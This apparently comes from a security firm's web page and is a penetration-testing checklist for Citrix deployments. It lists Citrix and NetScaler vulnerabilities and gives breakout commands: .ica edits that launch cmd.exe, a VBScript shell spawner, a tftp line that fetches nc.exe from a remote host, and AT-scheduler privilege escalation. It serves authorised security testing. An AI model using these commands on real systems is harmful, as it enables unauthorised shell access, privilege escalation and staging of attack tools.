Telephone: 732-763-2814
Email: service@infosecpro.com

T O P   T H R E A T S :

Abuse of Cloud Computing

Insecure Interfaces and APIs
Malicious Insiders
Shared Technology Issues
Data Loss or Leakage
Account or Service Hijacking
Unknown Risk Profile


Common Exploits

Server Specific
Network Specific
CISCO Specific

CITRIX Specific

T E S T I N G   S T E P S

Password Craking

Citrix Specific Testing:

Citrix provides remote access services to multiple users across a wide range of platforms. The following information will help you conduct a vulnerability assessment/ penetration test of Citrix implementations.



      • CGI abuses
        • NetScaler web management interface ip address cookie disclosure
      • CGI abuses : Cross Site Scripting (XSS)
        • Citrix MetaFrame XP login.asp
        • Citrix NFuse Launch Scripts
        • NetScaler web management XSS
      • Misc.
        • Citrix Published Applications Remote Enumeration
        • NetScaler web management cookie information
      • Service Detection
        • Citrix Licensing Server detection
        • Citrix Server detection
      • Web Servers
        • Citrix NFuse Server launch.asp Arbitrary Server/ Port Redirect
        • NetScaler web management cookie cipher weakness
        • NetScaler web management interface detection
        • Unencrypted NetScaler web management interface
      • Windows
        • Citrix Licensing Server License Management Console
        • Citrix Password Manager Agent Secondary Credential Information Disclosurey
        • Citrix Password Manager Service Stored Credentials Disclosure
        • Citrix Presentation Server Remote Code Execution
        • Citrix Presentation Server Client Program Neighbourhood Agent (PNAgent) Denial of Service
        • Citrix web interface 4.6, 5.0, 5.0.1 XSS
        • Novell Client TS/ Citrix Session Arbitrary User Profile Invocation
        • NetScaler web management cookie cipher weakness
        • NetScaler web management interface detection
        • NetScaler web management login
        • Unencrypted NetScaler web management interface
    • perl nikto.pl -host ip_address -port port_no.
      • Note: - It is possible to grep all Citrix/ NFuse/ NetScaler vulnerabilities currently housed in the nikto db and create your own db_tests file replacing the local version in nikto\plugins directory should you wish to specifically limit your enumeration to Citrix vulnerabilties. As of 1 Oct 09, there are currently 9 specific tests meeting these requirements.

  • Exploitation

    • Alter default .ica files
      • InitialProgram=cmd.exe
      • InitialProgram=c:\windows\system32\cmd.exe
      • InitialProgram=explorer.exe
    • Enumerate and Connect
      • For applications identified by Citrix-pa-scan
          • Requires pas.wri to be present in the same directory (obtained from the output using Citrix-pa-scan)
          • Writes output to pas_results.wri
      • For published applications with a Citrix client when the master browser is non-public.
          • pa-proxy.pl IP_to_proxy_to (i.e. remote server)
    • Manual Testing
      • Create Batch File (cmd.bat)
          • cmd.exe
          • echo off
          • command
          • echo on
        • Option Explicit
        • Dim objShell
        • Set objShell = CreateObject("WScript.Shell")
        • objShell.Run "%comspec% /k"
        • WScript.Quit
        • alternative functionality
          • objShell.Run "%comspec% /k c: & dir"
          • objShell.Run "%comspec% /k c: & cd temp & dir >temp.txt & notepad temp.txt"
          • objShell.Run "%comspec% /k c: & tftp -i ip_address GET nc.exe" :-)
        • Integrated Kiosk Attack Tool
          • Reconnaissance
          • FileSystem Links
          • Common Dialogs
          • Application Handlers
          • Browser Plugins
          • iKAT Tools
      • AT Command - priviledge escalation
        • AT HH:MM /interactive "cmd.exe"
        • AT HH:MM /interactive %comspec% /k
        • Note: - AT by default runs as system and although enabled for a normal user, will only work with these privileges for an admin, however, still worth a try.

      • Keyboard Shortcuts/ Hotkeys
        • Ctrl + h – View History
        • Ctrl + n – New Browser
        • Shift + Left Click – New Browser
        • Ctrl + o – Internet Address (browse feature)
        • Ctrl + p – Print (to file)
        • Right Click (Shift + F10)
          • Save Image As
          • View Source
        • F1 – Jump to URL
        • SHIFT+F1: Local Task List
        • SHIFT+F2: Toggle Title Bar
        • SHIFT+F3: Close Remote Application
        • CTRL+F1: Displays Windows Security Desktop – Ctrl+Alt+Del
        • CTRL+F2: Remote Task List
        • CTRL+F3: Remote Task Manager – Ctrl+Shift+ESC
        • ALT+F2: Cycle through programs
        • ALT+PLUS: Alt+TAB

    Other members of our business group:

    COPYRIGHT (C) 2000 - 2011 InfoSecPro.com ALL RIGHTS RESERVED